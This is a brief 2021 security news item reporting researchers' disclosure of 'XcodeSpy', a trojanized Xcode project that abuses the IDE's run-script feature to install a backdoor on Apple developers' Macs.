Security News > 2021 > March > Hackers Infecting Apple App Developers With Trojanized Xcode Projects
Cybersecurity researchers on Thursday disclosed a new attack wherein threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend that involves targeting developers and researchers with malicious attacks.
Dubbed "XcodeSpy," the trojanized Xcode project is a tainted version of a legitimate, open-source project available on GitHub called TabBarInteraction that's used by developers to animate iOS tab bars based on user interaction.
"XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer's macOS computer along with a persistence mechanism," SentinelOne researchers said.
The doctored Xcode project does something similar, only this time the attacks have singled out Apple developers.
"XcodeSpy takes advantage of a built-in feature of Apple's IDE which allows developers to run a custom shell script on launching an instance of their target application," the researchers said.
Adversaries have previously resorted to tainted Xcode executables to inject malicious code into iOS apps compiled with the infected Xcode without the developers' knowledge, and subsequently use the infected apps to collect information from the devices once they are downloaded and installed from the App Store.